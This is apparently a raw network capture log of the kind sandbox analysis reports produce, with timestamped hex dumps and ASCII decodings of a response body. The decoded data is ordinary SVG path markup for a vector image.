                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6217INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6233INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6249INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6265INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6281INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6297INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6313INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6329INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6345INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                                        Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6361INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6377INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6393INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6409INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6425INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6441INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                                        Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6457INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6473INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
